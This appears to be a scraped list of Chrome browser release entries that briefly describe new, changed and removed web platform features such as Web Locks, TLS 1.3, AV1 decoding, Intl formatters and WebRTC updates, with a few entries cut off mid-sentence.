This API allows scripts running in one tab to asynchronously acquire a lock, hold it while work is performed, then release it. While held, no other script in the origin can acquire the same lock. A lock represents some potentially shared resource, identified by a name chosen by the web app. For example, if a web app running in multiple tabs wants to ensure that only one tab is syncing to the network, each tab could try to acquire a “my_net_sync” lock, but only one tab will succeed.
Allows WebAssembly modules to import and export mutable globals. This building block will allow efficient passing of values like shadow stacks pointers between dynamically linked modules (especially in the multi-threaded case).
Add sign extension opcodes to WebAssembly. This makes some code sequences shorter and allows us to provide only zero extended versions of atomic opcodes for threads.
When spec-complaint SDP format “Unified Plan” is used, RTCRtpTransceiver describes each sender-receiver pair that is added to the RTCPeerConnection. This represents the components used to send and receive media. Exposing the transceiver gives the application the ability to receive media early and provides more control over the generated SDP. APIs that are shipping include RTCRtpTransceiver, RTCPeerConnection.addTransceiver() and RTCPeerConnection.getTransceivers().
The performance.memory property is a non-standard API, seeing significant usage from some of our partners. With this change, if the renderer is locked to a site reported values will not contain coarse quantization and delay. This will allow developers to detect performance regressions from user data more easily because the memory measurements will be more accurate and can be taken more frequently.
Because of a technical limitation, navigator.serviceWorker was previously exposed on insecure contexts and threw a Security Error when used. After this change, navigator.serviceWorker will return undefined. This aligns with the specification.
We have a security vulnerability that is rather long in the tooth (not yet public) that depends, in part, on our DNS resolver’s willingness to attempt to resolve arbitrary garbage strings, including strings that could not ever be valid hostnames.
I propose to remove support for such requests in our DNS resolution code, and attempt only to resolve legal hostnames (“preferred name syntax”). Additionally, I propose we accept underscores (_) in names. (See the measurement CL.)
The HTMLMediaElement.stalled event fires when media download has failed to progress for at least 3 seconds. In Media Source Extensions, the web app manages the download and the media element is not aware of its progress. Since some apps append media data in chunks larger than 3 seconds, stalled was being fired at inappropriate times. To solve this, stalled has been removed for Media Source Extensions.
The document.createTouchList() method is being removed because the Touch() constructor has been supported since Chrome 48.
<input type=”image”>
As per spec,
https://html.spec.whatwg.org/multipage/form-control-infrastructure.html#constructing-form-data-set, the constructed “form data set” should not include the value of the image button
If a document in a background tab calls window.confirm() then the call to confirm() will return immediately with false, and no dialog will be shown to the user. If the tab is active, then the call will show a dialog. Specifically, this removes the ability to use window.confirm() to bring a tab to the front against the user’s will.
RTCPeerConnection.id provides a string that identifies an RTCPeerConnection. This is useful when a peer connection needs to be referenced outside the JavaScript context, for example, on the server side, or by a logging mechanism.
This feature allows specifying the worker’s name in an optional constructor argument. This lets you distinguish dedicated workers by name when you have multiple workers with the same URL. Developers can print ‘name’ in the DevTools console which will make it easier to debug workers. When the ‘name’ param is omitted, an empty string is used as the default value. For more information, see the discussion at https://github.com/whatwg/html/issues/2477.
AV1 is a next generation codec developed by the Alliance for Open Media. AV1 improves compression efficiency by 30% over the current state-of-the-art video codec, VP9. The AV1 decoder will be added to Chrome Desktop x86 devices (Windows, macOS, Linux, Chrome OS) based on the official bitstream specification. At this time, support is limited to “Main” profile 0 and does not include encoding capabilities. The supported container is ISO-BMFF (MP4).
<script>
elementsMany resource-fetching elements have support for the referrerpolicy
attribute, which lets developers provide a keyword to influence the value of the Referer
HTTP header that accompanies a request. The <link>
element has support for this, so it is technically possible to preload a script with a developer-set referrer policy even though the <script>
element does not have support for this attribute. This feature adds referrerpolicy
support to the <script>
element.
Dialogs (e.g. authentication prompts, payments, filepickers) require proper context for users to make decisions. Fullscreen, by definition is immersive, and removes the context that a user needs to make a decision.
Therefore, whenever a page causes a dialog to be shown, that page will lose any HTML5 fullscreen that it has entered.
An intervention is when a user agent does not honor an application request for security, performance, or annoyance reasons. With this change, Chrome will both send the report to your servers using the Report-To HTTP Response header field and surface the report in the ReportingObserver interface.
If a Data Saver user is on a 2G-speed or slower network according to the NetInfo API, Chrome disables scripts and sends an intervention header on every resource request. Users are shown a Lite Mode UI in the omnibox. Users can enable scripts on the page by tapping “Show original” in the omnibox UI. An intervention report is sent when this optimization occurs.
An optional PostMessageOptions object is being added to the postMessage() function for 6 of the 7 interfaces where it’s supported, specifically, DedicatedWorkerGlobalScope, Worker, ServiceWorker, ServiceWorker, and Window. This gives the function a similar interface on its definitions and allows it to be extended in the future. Since broadcastChannel.postMessage() doesn’t take additional arguments (such as transfer) it is not being changed.
This change implements getConfiguration() according to the WebRTC 1.0. Specifically it returns the last configuration applied via setConfiguration(), or if setConfiguration() hasn’t been called, the configuration the RTCPeerConnection was constructed with.
The OS build number (for example, “NJH47F” or “OPM4.171019.021.D1” on Android) has been removed from the user-agent identification (User-Agent header and navigator.userAgent) on Android and on iOS. The iOS change follows Safari’s implementation and freezes the build number as “15E148” instead of removing it.
This will prevent abuses of that information such as exploit targeting and fingerprinting. It’ll also bring Chrome closer in line with RFC 7231 section 5.5.3.
The Atomics.wake() method is being renamed Atomics.notify(). This is a low-level function to wake a Worker that has been suspended via Atomics.wait(). This conforms to a specification change made to alleviate confusion created by the similarity of the names wait and wake.
Opus is an audio codec already supported by the HTML5 src attribute on <url>
elements. This applies to mp4, ogg, and webm containers as well as in webm containers using Media Source Extensions. This change adds support for the Opus codec in the mp4 container to MSE.
This change adds the SourceBuffer.changeType() method to improve cross-codec or cross-bytestream transitions during playback with Media Source Extensions.
This feature is a built-in Web Authentication/CTAP platform authenticator for Chrome on macOS based on the Touch ID fingerprint sensor and secure element in Macbook Pros with Touch bars. It allows users to use Touch ID for 2-factor authentication on sites that implement this via the Web Authentication API.
A description property is being added to Symbol.prototype. This provides a more ergonomic way of accessing the description of a Symbol. Previously, the description could be only be accessed indirectly through the Symbol.protoype.toString().
TLS 1.3 is an overhaul of the TLS protocol with a simpler, less error-prone design that improves both efficiency and security. The new design reduces the number of round-trips required to establish a connection and removes legacy insecure options, making it easier to securely configure a server. It additionally encrypts more of the handshake and makes the resumption mode more resilient to key compromise.
<rp>
element defaults to display:noneThe default style of the <rp>
element is changed to “display:none” instead of “display:inline” even if it is not inside the <ruby>
element as defined in HTML specification. This behavior is implemented in the UA style sheet, but the web author can override it.
Behavior in other browsers:
<ruby>
), display:none (inside <ruby>
)<ruby>
)To avoid confusion on touch feature detection, ontouch* members on window, document, and element are disabled by default on desktop devices (Mac, Windows, Linux, ChromeOS). Note that this is not disabling touches, and usage such as addEventListener("touchstart", ...)
is not being affected.
This updates the behavior of percentage row tracks and gutters in grid containers with indefinite heights. Previously, these were behaving similarly to percentage heights in regular blocks, but the CSS WG has resolved to make them behave the same as for columns, making them symmetric. Percentages are now ignored when computing intrinsic height and resolved afterwards against that height. That way both column and row axes will have symmetric behavior to resolve percentages tracks and gutters.
When receiving a 401 HTTP response during the WebSocket handshake, Chrome will attempt to continue authentication on the same socket. Windows HTTP authentication usually requires a single connection to be reused for authentication to succeed. Until now, Chrome has always closed the connection on a 401 status response, so Windows authentication has not worked. Windows authentication support is mostly useful in enterprise environments where single-sign-on is used.
WebUSB is enabled inside dedicated worker contexts. This allows developers to perform heavy I/O and processing of data from a USB device on a separate thread to reduce the performance impact on the main thread.
This change deprecates and removes the legacy “item()” accessor method for the array of Gamepads returned by navigator.getGamepads(). This change improves compatibility with Firefox which is so far the only browser to implement GamepadList.
AppCache is now removed from insecure contexts. AppCache is a powerful feature that allows offline and persistent access to an origin, which is a powerful privilege escalation for an XSS. This will remove that attack vector by only allowing it over HTTPS.
This feature was deprecated in Chrome 67.
Deprecate and remove HTMLFrameSetElement’s anonymous getter which is non-standard.
Token binding allows servers to cryptographically bind bearer tokens (such as cookies) to the TLS layer, to prevent attacks where an attacker exports a bearer token from the user’s machine to present to a web service and impersonate the user.
Web Audio will follow the rules of the autoplay policy already followed by other parts of Chrome able to produce sound. When an AudioContext is created, it will start as suspended if it wasn’t allowed to play. Calling resume() will only start the AudioContext if it is allowed to play. Furthermore, a previously blocked AudioContext will automatically be resumed if start() is called on a connected node after the document is user activated.
CSS3 Text Decoration spec adds new properties that implement new text decoration styling features such as lines, color, and style. This feature adds support for ‘left’ and ‘right’ values of the ‘text-underline-position’ property. The property itself shipped in Chrome 57. Currently, in vertical flow for Chinese and Japanese, which side the underline appears on is not the same across browsers. This enhancement fixes that.
Chrome did not count the specificity for the :host() and :host-context() pseudo classes themselves. ::slotted() did not count the specificity for its arguments. This was not specified until 1 was resolved. From M71 Chrome ships specificity calculations per spec for Shadow DOM v1. The old behavior is kept for v0 for compatibility with existing content.
1 https://github.com/w3c/csswg-drafts/issues/1915
Bugs:
https://crbug.com/888042
https://crbug.com/857415
Adds the ability to customize the requestFullscreen API with FullscreenOptions on Android. This allows developers to chose between making the navigation bar visible versus a completely immersive mode where no user agent controls are shown until a gesture is performed.
Some developers may prefer that the navigation bar be visible when entering fullscreen mode as it can be difficult for users to determine how to exit fullscreen mode. Some browsers such as Samsung also make this the default.
Async touchpad pinch zoom events are for improving the page pinch zoom performance. Currently, the touchpad pinch zoom exposes a control wheel event that allows JS to cancel it. With this change, if the user doesn’t make a pinch action on the touchpad, effectively canceling the control wheel event, then following control wheel events are not cancelable. But JavaScript does not know which ctrl wheel is the first one in the sequence, so if you want to cancel pinch zoom, you need to cancel all of t
COLR/CPAL fonts are one type of OpenType color fonts. These fonts compose layers of vector outline glyphs and color palette information into the final colored glyph. With this change, Chrome will support 3 color font formats cross-platform, the other two being CBDT/CBLC and SBIX. Because they are vector based, COLR/CPAL fonts provide for faster downloads and require less storage. An example of a COLR/CPAL font is the Twemoji color font (https://github.com/mozilla/twemoji-colr).
Add support for CSS Image Values 4 color stop position syntax.
Currently, repeating colors require explicit positions, for example:
linear-gradient(45deg, black 25%, black 50%, white 50%, white 75%)
To simplify the definition of solid color bands, css-images-4 allows specifying up to two positions for a color:
linear-gradient(45deg, black 25% 50%, white 50% 75%)
Call capture event listeners in capturing phase at shadow hosts.
Per the discussion of https://github.com/whatwg/dom/issues/685, Blink will align the event dispatch behavior to other browsers; Call capture event listeners in capturing phase at shadow hosts.
Image Capture API has a means to set exposureMode to manual which is not useful if you cannot set the exposure time (aka shutter speed, aka exposure duration). This change provides an interface for getting the exposure time range values as well as setting the exposure time in time units.
IndexedDB databases() returns a list of all databases accessible by the origin of the current frame. The return value is a Promise that resolves with a list of IDBDatabaseInfo objects (currently just dictionaries of database name and version).
Intl.RelativeTimeFormat helps libraries and frameworks format relative time in a localized fashion by providing internationalized messages for date and time fields, using a customary local word or phrase when available. For example, calling its format() method with -5 and ‘day’ would return the string ‘5 days ago’.
Intl.RelativeTimeFormat is available behind a flag in Firefox 58.
The “persistent-storage” property is a new permission for the Permission API. The permission state can already be queried with navigator.storage.persisted(), with this change navigator.permissions.query({name:“persistent-storage”}) can be used as well.
Currently, iframes on the web can make permission requests and users will be shown permission prompts that contain the origin of the iframe. Making permission decisions for iframes and managing previous decisions is complicated and confusing.
To address this problem, we propose that users only ever be required to make permission decisions about the top level origin of a website. It is then up to the top level website to delegate permission to the various iframes which it embeds, if it chooses.
The Picture-in-Picture API allows websites to create a floating video window that is always on top of other windows so that users may continue consuming media while they interact with other sites or applications on their device. This change only applies to <video>
elements.
This change corrects a non-compliant type in the formatToParts implementation.
Text encoding and decoding will support streams to enable you to easily convert streams of binary data to text and vice-versa. An example of its usefulness is with readable streams. With a non-stream Response object, response.Body.text() returns text. There is no equivalent for the ReadableStream returned by Response.Body, which can only return bytes. With the new API a streaming response body may be converted to text as so: Response.Body.pipeThrough(new TextDecoderStream()).
The fullscreen API has features for entering, and exiting fullscreen mode as well as event handlers for monitoring such changes. A prefixed version of the API has been supported since Chrome 15. This update adds an unprefixed version of the API.
The W3C Web Authentication API1 provides an official replacement for the internal extension that Chrome ships to implement the FIDO U2F API for security keys.
The getTransports call is part of the current level two draft[2] and provides transport (e.g. USB, NFC, etc) information without wedging it into the attestation certificate, which is the current practice.
1 https://w3c.github.io/webauthn/
[2] https://github.com/w3c/webauthn/commit/11d549048ac5e462a4f9f44499032302adb29800
Extends WebAssembly to support PostMessage of WebAssembly.Module objects to Web Workers. To clarify, this is scoped to just Web Workers (same process, different thread), and not extended to cross-process scenarios (such as cross-origin postMessage, or shared web workers).
Chrome historically allowed creation of MediaElementAudioSourceNode’s, MediaStreamAudioSourceNode’s, and MediaStreamAudioDestinationNode’s using an OfflineAudioContext. This does not comply with the spec; these nodes should only be available for an AudioContext. The behavior with an OfflineAudioContext is not well-defined and contrary to the real-time nature of the nodes themselves.
Thus, only allow these nodes to be constructed for an AudioContext.
globalThis
enables a universal mechanism to access the global object even in strict functions or modules, regardless of the platform.
Adds a new method, queueMicrotask() that allows direct queueing of a callback to run as a microtask. Microtasks are callbacks that run just before the current task ends. Current examples are callbacks for promises that resolve immediately. This method is available on the window and worker objects. See the explainer:
https://github.com/fergald/docs/blob/master/explainers/queueMicrotask.md
This API has been deprecated in 2013 and superseded by assigning streams to srcObject.
This deprecation will cause speechSynthesis.speak to immediately fire an error if the document has not received user activation. This API is being abused by sites since it is one of the only remaining APIs which didn’t adhere to autoplay policies in Chrome. This was deprecated in Chrome 70.
Until this deprecation, a service worker could use importScripts() to import any script at any time. After this change, a service worker can only importScripts() in two cases:
installed
state).The prefixed WebKitAnimationEvent interface will be removed. It is a non-standard alias for the widely supported AnimationEvent interface (https://developer.mozilla.org/en-US/docs/Web/API/AnimationEvent). For interoperability between browsers, web developers should use the standard AnimationEvent instead.
The prefixed WebKitTransitionEvent interface will be removed. It is a non-standard alias for the widely supported TransitionEvent interface (https://developer.mozilla.org/en-US/docs/Web/API/TransitionEvent). For interoperability between browsers, web developers should use the standard TransitionEvent instead.
The document.origin property will be deprecated and removed in Chromium, and then likely also removed from the DOM Standard. This property was only ever implemented in Chromium and WebKit. It is redundant with self.origin which can be used in both window and worker contexts and has wider support.
Crash reports are a new type of report available via the Reporting API. These reports indicate that a crash occurred on a page and possibly the reason it occurred (out of memory for example).
This feature extends the existing syntax for module exports by the form
export * as foo from “bar”
which is the analogue to the existing form
import * as foo from “bar”
The ErrorEvent interface, inheriting from from its parent Event, represents events providing information related to errors in scripts or in a file. According to specifications, unhandled runtime script errors fire an ErrorEvent at a target and this interface should be exposed to web workers.
The File.webkitRelativePath of the File interface previously returned a value different from other major browsers, now it returns the same value.
For example, if a user has the following local files:
/tmp/a/foo/bar/1.txt, /tmp/a/foo/2.txt
and they selected /tmp with a file chooser dialog, webkitRelativePath in Chrome was:
foo/bar/1.txt, foo/2.txt
Other browsers, which Chrome now matches, return this:
tmp/a/foo/bar/1.txt, tmp/a/foo/2.txt
Intl.ListFormat helps libraries and frameworks format a list in a localized fashion by providing internationalized messages using a customary local word or phrase when available. For example, calling its format() method with [“Alice”, “Bob”, “Charlie”, “Delta”] returns the string “Alice, Bob, Charlie, and Delta” in English.
The default credentials mode for module script requests is changing from “omit” to “same-origin”, providing credentials to same-origin module script requests and their descendant scripts (static & dynamic imports). The current behavior can be surprising in that it’s misaligned with other high-level features like the Fetch API, and in the web platform’s current architecture, causes a second server connection. This is undesirable for developers looking to reduce latency.
Captures a screen or application window to a MediaStream, for recording or sharing over the network.
This allows conferencing services to provide shared presentations in a conference, and allows remote control tools like Chrome Remote Desktop to provide an image of the controlled computer’s screen to the controlling computer.
This property controls the method the browser uses to derive the resolution of a MediaStreamTrack. There are two supported values:
“none”: the track has the native resolution provided by the camera, its driver, or the OS.
“crop-and-scale”: the browser may use cropping and rescaling to adjust the resolution of the video produced by the camera.
This is useful for getting more consistent behavior across browsers, or if an application wants to make sure it gets only native resolutions.
The navigator.languages property exposes the Accept Language header and the languageevent, which is fired on the Window object to notifiy scripts of changes to this value. Both features allow web applications to handle i18n in the client and react to user language changes. This change makes these features available to workers. Specifically, navigator.languages is available on workers and languageevent is fired on workers as well as the main thread.
This feature introduces public fields to classes in ECMAScript.
class MyClass {
instanceProperty = 0;
static staticProperty = 0;
}
RTCPeerConnection.connectionState is a aggregate value computed from the transport states of the peerconnection’s underlying ICE and DTLS transports.
It’s intended to provide a more complete overview of the connection state than RTCPeerConnection.iceConnectionState, which is only supposed to be based on the ICE transports.
FetchEvent.resultingClientId, set on navigation requests or requests for workers, is the ID of the client, either a document or a worker that is created by the request. This is useful for associating the main resource request for a document with subsequent subresource requests from the document for logging and metrics purposes.
Previously, technical limitations prevented service workers from receiving FetchEvents for favicon requests. Now, service workers receive FetchEvents as long as the request URL is on the same-origin as the service worker.
Trusted Web Activities are a mode of Chrome Custom Tabs without browser UI, available to web content an app developer controls.
We want the modern mobile web (primarily PWAs) to go mainstream. Nevertheless, they make up a small proportion of app experiences on Android today. The vast majority of developers simply haven’t made one yet. TWAs lower the risks of distribution by allowing developers to integrate their PWA into a native app and give PWA developers the same capabilities as native apps.
Some APIs cannot be used with a user activation (https://html.spec.whatwg.org/multipage/interaction.html#activation). Examples include requestFullScreen(), autoplay, window.open(). This restriction is a powerful tool for preventing annoying behavior by web pages. Unfortunately, there is no way to determine if a user activation is active. The User Activation Query API adds this ability.
User activation is the mechanism to maintain active-user-interaction state that limits use of “abusable” APIs (e.g. opening popups or vibrating). The web exposed behavior varies widely among major browsers. To unify the web, this feature defines a new user activation model that is simple enough for cross-browser implementation. The main changes introduced by this model are: (a) there is no concept of token passing, and (b) activation visibility changes from stack-scoped to frame-scoped.
RTCPeerConnections generate and parse SDP according to the standardized format. Exchanging SDP is needed to set up calls in WebRTC. Following the standard is important for cross-browser interoperability. Unified Plan also enables the RTCRtpTransceiver APIs. Changing from the old (“Plan B”) to the new format can cause backwards-compatibility issues or break applications, see the Transition Guide: https://docs.google.com/document/d/1-ZfikoUtoJa9k-GZG1daN0BU3IjIanQ_JSscHxQesvU/edit?usp=sharing
A Stage 3 ECMAScript proposal changes JSON.stringify to prevent it from returning ill-formed Unicode strings.
Previously, JSON.stringify would output lone surrogates if the input contained any lone surrogates:
JSON.stringify("\uD800");
// --> '"�"'
With this change, JSON.stringify outputs escape sequences for lone surrogates, making its output valid Unicode (and representable in UTF-8):
JSON.stringify("\uD800");
// --> '"\ud800"'
For dedicated workers, if an error is not handled then it will be propagated up to the parent context and the error reporting process begins again one layer up (e.g., to the window’s onerror handler). This allows for errors to be propagated up to the original document giving developers the freedom to choose when and how to handle worker errors.
Deprecate TLS 1.0 and 1.1, targeting removal in Chrome 81 (early 2020). During the deprecation period, sites using those protocols will show a warning in DevTools. After the deprecation period, in 2020, they will fail to connect if they have not upgraded to TLS 1.2 by then.
The Cache.addAll()
API allows multiple entries to be added to the cache at once. The spec requires that each request/response pair avoid overwriting another entry being added in the same call.
Previously chrome would resolve such conflicts by storing the later entry and ignoring the earlier entry. This feature is to fix this behavior and properly reject with InvalidStateError.
HTTP-Based Public Key Pinning (HPKP) was intended to allow websites to send an HTTP header that pins one or more of the public keys present in the site’s certificate chain.
It has very low adoption, and although it provides security against certificate misissuance, it also creates risks of denial of service and hostile pinning. See https://groups.google.com/a/chromium.org/d/msg/blink-dev/he9tr7p3rZ8/eNMwKPmUBAAJ for details.
FTP is a non-securable legacy protocol. When even the linux kernel is migrating off of it (https://www.kernel.org/shutting-down-ftp-services.html), it’s really time to move on. One step toward deprecation and removal is to deprecate rendering resources from FTP servers and instead download them. We’ll still generate directory listings, but any non-directory listing could be downloaded rather than rendered in the browser.
By spec, ‘#’ characters in data URIs should not be treated as part of the URI body, and should instead only mark the start of the URI fragment component. Historically Chrome has not adhered to the spec, instead treating ‘#’ characters as both fragment-starters and part of the body.
On web pages that are expected to load slowly, Chrome may modify loading behavior to provide a faster page load to Lite Mode (Data Saver) users. This behavior modification can take many forms including but not limited to: blocking specific resources, loading partial resources, loading a previously saved version of the page, using Google servers to rewrite pages, etc.
On webpages that are expected to load slowly, stop loading of non-critical resources. This includes (but is not limited to) JavaScript and CSS resources that do not contribute significantly to the visual appearance. This would be limited to only the data saver users. Users are shown a Lite Mode UI in the omnibox. Users can load default behavior by tapping “Show original” in the omnibox UI. An intervention report is sent when this optimization occurs.
This method allows web developers to read back the ContextAttributes consumed by the platform and compare them to what were requested. Shipping this method will allow lining up with WebGL’s homonymous method.
1 https://cs.chromium.org/chromium/src/third_party/blink/renderer/modules/canvas/canvas2d/canvas_rendering_context_2d.idl?l=142
A standalone API using the QUIC transport protocol to exchange arbitrary data with remote peers. This provides a generic multiple-way transport that doesn’t use the full PeerConnection stack designed for media purposes.
The base API is shared with WebTransport. The difference is the RTCQuicTransport is P2P and uses ICE. For discussion on the webtransport see:
https://discourse.wicg.io/t/webtransport-proposal/3508
https://github.com/WICG/web-transport
This specification defines the ::part() pseudo-element on shadow hosts, allowing shadow hosts to selectively expose chosen elements from their shadow tree to the outside page for styling purposes.
The base URL of stylesheets is now the response URL of the stylesheet rather than the request URL. These are only different if a service worker provided the response. If the service worker does respondWith(fetch(url)), the base URL becomes url.
Also, to align with the specification, stylesheets that (a) failed to load due to network error, or (b) loaded via a redirect from cross-origin back to same-origin are considered cross-origin.
The API provides a way to create CSSStyleSheet objects from script without needing <style>
or <link>
elements. Script can optionally modify the stylesheet by adding, removing, or replacing rules in it. Each stylesheet object can then be adopted/used in multiple tree scopes (document/shadow roots). Not only does this reduce memory duplication, it also allows an element’s styles to be modified in a single location.
“Cross-Origin-Resource-Policy” response header allows http servers to ask the browser to prevent cross-origin or cross-site embedding of the returned resource. It is complementary to the Cross-Origin Read Blocking feature and is especially valuable for resources not covered by CORB (which only protects HTML, XML and JSON).
“Cross-Origin-Resource-Policy” is currently the only way to protect images against Spectre attacks or against compromised renderers.
This function post-multiplies a non-uniform scale transformation on the current matrix and returns the resulting matrix. It is being re-added to support legacy compatibility with SVGMatrix. Non-uniform scaling is a transformation in which at least one of the scaling factors is different from the others. For example, non-uniform scaling might turn a rectangle into a square or a parallelogram.
This feature provides applications the ability to query whether a certain HDCP policy can be enforced so that playback can be started at the optimum resolution for the best user experience.
We changed our rendering to match the flexbox specification and other browsers. In previous versions, Chrome did not implement the automatic minimum size for the specific case of a column flexbox containing a flex item that is itself a flexbox. We have now changed this so that such flex items do get the right minimum size.
This can cause flex items to not shrink anymore when they used to; to avoid that, set min-height: auto on the flex item.
Provides the touched state of a gamepad button, which indicates whether a finger is on a button independent of whether it’s being pressed.
Allows viewport-filling scrollers (iframes, divs) to perform document-level scrolling actions. I.e. show/hide URL bar, overscroll glow, rotation anchoring, etc.
Enable websites to customize media metadata so they can control the notification and lock screen UI. Also allows control of media from outside a page, as well as using platform UIs and managing media keys.
Object.fromEntries() turns a list of key-value pairs into an object.
Allows sites to send HTTP request/response pairs (exchanges) that are authoritative for an origin, even when the server itself is not authoritative for that origin.
This is part of Web Packaging, which will allow people to share web applications peer-to-peer, while offline, with proof that an app comes from its original author.
This also shares some infrastructure with signature-based SRI.
Add a networkPriority field to RtcRtpSender Paremeters property to allow different senders’ media to use differnt DSCP markings.
This allows the client to accept configuration from administrators to work better in constrained network environments, or with wifi WMM prioritization.
PerformanceObserver.supportedEntryTypes provides a way to feature-detect the PerformanceEntry types that are implemented in a web browser. The types are sorted alphabetically. For example, a developer running this in Chrome could get something like this in the console:
PerformanceObserver.supportedEntryTypes
// Output is: [“longtask”, “mark”, “measure”, “navigation”, “paint”, “resource”]
Adds a boolean property to RTCConfiguration.offerExtmapAllowMixed() to enable the extmap-allow-mixed attribute in a session description protocol (SDP) offer.
The SDP attribute extmap-allow-mixed, as defined in RFC8285, will be included in the SDP offer if this property is set to true. The SDP attribute extmap-allow-mixed is supported from Chrome 71, but due to backwards compatibility problems it was not included in the SDP offer by default.
The getParameters() method returns the RTCRtpReceiver object’s track decoding parameters, which includes the codec and RTP header lists negotiated for the call, the RTCP information, and the layer count.
This API is analog to RTCRtpSender.getParameters() and presents similar information for a call, but on the receiver side. It does not allow modification of the call’s parameters.
The getSynchronizationSources() method returns the latest playout timestamps of RTP packets for audio and video receivers. This is useful for determining in real time which streams are active, such as for the use case of audio meters or prioritizing displaying active participant streams in the UI.
String.prototype.matchAll() behaves similarly to String.prototype.match(), but returns a full regexp result object for each match in a global or sticky regexp. This offers a simple way to iterate over matches when access to, for example, capture groups is needed.
Historically, Blink’s blur-radius interpretation has been at odds with both the CSS and Canvas2D specs: Blink shadows cover about half the expected area (see linked bug).
With this change Gaussian blur sigma is now computed as 1/2 blur-radius, as mandated by spec. Blink’s shadow implementation now matches FireFox and Safari.
Chrome will improve how CSS transforms are handled to reduce cases where a matrix interpolation fallback is used. An interpolation is an intermediate transformation. Sometimes interpretation of the CSS rule requires falling back to a matrix to accomplish the interpolation, and this can produce visual results other than what the web developer intends. To mitigate this, the spec was changed to reduce the number of situations when this can occur.
The wheel/mousewheel event listeners that are registered on document level targets (window.document, window.document.body, or window) will be treated as passive if not specified as otherwise and calling preventDefault() inside such listeners will be ignored. This is the wheel version of the scrolling intervention which is shipped in Chrome 56: https://developers.google.com/web/updates/2017/01/scrolling-intervention
The specification requires RTCRtpContributingSource to be a dictionary, but it was previously shipped as an interface. With this change RTCRtpContributingSource will no longer have a prototype and getContributingSources() will create a new set of objects with each call.
This feature integrates Chrome on Windows with the Windows WebAuthn platform APIs. This enables talking to FIDO U2F and CTAP authenticators for 2-factor authentication over USB, BLE, NFC via the Web Authentication API. This additionally adds support for the Windows Hello platform authenticator for 2-factor and user-verifying authentication.
XHR now uses the response URL rather than the request URL for responseURL and responseXML. These are only different if a service worker provided the response. If the service worker does respondWith(fetch(url)), then responseURL is url and responseXML.URL is url.
The base URL of XSLT stylesheets is now the response URL of the stylesheet rather than the request URL. These are only different if a service worker provided the response. If the service worker does respondWith(fetch(url)), the base URL becomes url.
Thanks to the WebContents Occlusion feature in Chromium, the Page Visibility Web API will now reflect accurately the visibility state of web pages, especially when they are occluded. In other words, the document.visibilityState value will be “hidden” when browser tab/window is covered by one or multiple window(s).
Add imagesrcset and imagesizes attributes to <link rel=preload as=image>
, that correspond to the srcset and sizes attributes of HTMLImageElement. We are using imagesizes here instead of sizes because it already has a different meaning for HTMLLinkElement in the rel=icon case.
When establishing an HTTPS connection over an HTTP/HTTPS/H2/QUIC proxy, we send a CONNECT request with its own set of headers. Currently, if the original HTTPS request had a custom user-agent string, we would send that with the CONNECT request, rather than the default user-agent header. We plan to remove this behavior, and just use the configured global user-agent header.
EXPLAIN’s output is not guaranteed to be stable over SQLite versions, so developers cannot rely on it. REINDEX is only useful when collation sequence definitions change, and Chrome only uses the built-in collation sequences.
When Chrome opens a URL with a fragment id, it decodes %xx and applies isomorphic-decode 1 to it, then tries to find an element with the decoding result as an ID in some cases. No other browsers do this, and it’s not defined by the standard.
For example, if a user opens example.com/#%F8%C0, Chrome
1 https://infra.spec.whatwg.org/#isomorphic-decode
Video in installed Progressive Web Apps (PWAs) will enter and exit picture-in-picture automatically when a document’s visibility changes.
Web apps for video meetings will benefit by allowing picture-in-picture when users switch back and forth between web apps and other applications or tabs. This is currently not possible because a user gesture is required to enter picture-in-picture.
Enable reporting of feature policy violations through the Reporting API.
Show a “Skip Ad” button in Picture-in-Picture window that notifies websites when user a interacts with it.
Enables functionality in the audio jitter buffer in WebRTC to adapt the delay to retransmitted packets.
The Face Detection API is a subset of the Shape Detection API which provides the ability to detect human faces and facial landmarks in an image provided by script. The image may come from any type of image buffer source such as an <image>
, <video>
or <canvas>
tag.
The Text Detection API is a subset of the Shape Detection API which provides the ability to detect and optionally transcribe text in an image provided by script. The image may come from any type of image buffer source such as an <image>
, <video>
or <canvas>
tag.
This setting scales down the resolution of a video’s layers in each dimension by the given value before sending. For example, setting the value to 2.0 scales each dimension by a factor of 2, sending a video a quarter of its size. The value must be greater than or equal to 1.0 (the default). The default value applies no scaling.
Allows developers to set the “sampleRate” for an AudioContext at the time it is created. This allows developers to set an arbitrary sample rate for audio processing in Web Audio API.
Background Fetch API provides a service worker based download and upload mechanism which is persistent across service worker and browser restarts.
The system will provide a developer-controllable interface to schedule, query, pause, and cancel background downloads and uploads. After a scheduled fetch completes, the system will notify the developer of the outcome of the operation.
In-progress fetches will be visible to users in a notification.
The CSS Transitions specification specifies that transition events are sent when a transition is enqueued, starts, ends, or is canceled as transitionrun, transitionstart, transitionend, and transitioncancel respectively.
These events mirror the CSS animation events which allow developers to observe CSS animations.
Support will be added for the CSS prefers-reduced-motion media query. The prefers-reduced-motion media query detects whether the user has requested that the system minimize the amount of motion it uses; in particular motion-based animation. This is for users who either require or prefer minimized motion. For example people with vestibular disorders often desire animation motion to be kept to a minimum.
If a popup navigates its opener to a URL which results in a download, the download will be blocked and the navigation cancelled, if the popup is cross-origin to its opener. This resolves a long standing security issue.
A JavaScript API will be exposed for feature policy. This API contains three functions.
document.featurePolicy.allowedFeatures() // What are the allowed features in this document?
document.featurePolicy.allowsFeature(‘geolocation’, <origin>
?) // Is geolocation allowed in this document or origin?
document.featurePolicy.getAllowlistForFeature(‘geolocation’) // What origins are allowed to use geolocation?
Allows the first line of a script or module source file to specify an interpreter to evaluate the script.
e.g.
#!/path/to/v8/v8-shell
print('Hello, world!');
Augment IntersectionObserver to report information about occlusion and visual effects.
Currently, IntersectionObserver does not consider whether a target element has been painted over (“occluded”) by other content or whether any visual effects have been applied which may alter or obscure the element’s display. This change adds a boolean field to IntersectionObserverNotification, indicating whether the UA can guarantee that the target will be displayed unoccluded and without visual effects.
Intl.Locale class allows the following:
Parsing and manipulating the language, region and script of a locale;
Reading or writing the Unicode extension tags in a locale;
Storing user locale preferences for this API in a serializable, standard format (rather than using a combination of language and the options object).
Make the MediaDevices interface and its related functions and types, including getUserMedia(), enumerateDevices() and getDisplayMedia() available only in secure contexts.
The PaymentRequest.hasEnrolledInstrument() method returns a boolean indicating whether the user has a payment instrument in their profile that matches the payment identifier in a PaymentRequest and whether it is ready to handle payment at the time PaymentRequest.show() is called.
This feature introduces private fields to classes in ECMAScript.
Note: This entry only pertains to the private fields part of the proposal, not the public fields.
RTCIceCandidate and RTCIceCandidateInit will be made spec-compliant.
